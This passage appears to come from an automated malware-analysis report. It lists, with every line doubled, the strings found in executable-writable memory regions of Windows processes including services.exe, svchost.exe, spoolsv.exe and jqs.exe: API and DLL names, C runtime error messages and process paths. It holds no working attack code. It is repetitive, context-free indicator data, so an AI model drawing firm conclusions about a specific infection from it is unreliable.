- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
services.exe_724_rwx_0004D000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\services.exe
%System%\services.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
services.exe_724_rwx_00BED000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\services.exe
%System%\services.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
svchost.exe_904_rwx_0093D000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\svchost.exe
%System%\svchost.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
svchost.exe_904_rwx_00EDD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\svchost.exe
%System%\svchost.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
svchost.exe_988_rwx_009BD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\svchost.exe
%System%\svchost.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
svchost.exe_988_rwx_00B4D000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\svchost.exe
%System%\svchost.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
svchost.exe_1084_rwx_0105D000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%WinDir%\System32\svchost.exe
%WinDir%\System32\svchost.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
svchost.exe_1084_rwx_053BD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%WinDir%\System32\svchost.exe
%WinDir%\System32\svchost.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
svchost.exe_1128_rwx_007ED000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\svchost.exe
%System%\svchost.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
svchost.exe_1128_rwx_0086D000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\svchost.exe
%System%\svchost.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
svchost.exe_1180_rwx_00CBD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\svchost.exe
%System%\svchost.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
svchost.exe_1180_rwx_00CDD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\svchost.exe
%System%\svchost.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
spoolsv.exe_1424_rwx_00B6D000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\spoolsv.exe
%System%\spoolsv.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
spoolsv.exe_1424_rwx_00FDD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\spoolsv.exe
%System%\spoolsv.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
jqs.exe_1640_rwx_010BD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%Program Files%\Java\jre6\bin\jqs.exe
%Program Files%\Java\jre6\bin\jqs.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
jqs.exe_1640_rwx_010DD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%Program Files%\Java\jre6\bin\jqs.exe
%Program Files%\Java\jre6\bin\jqs.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL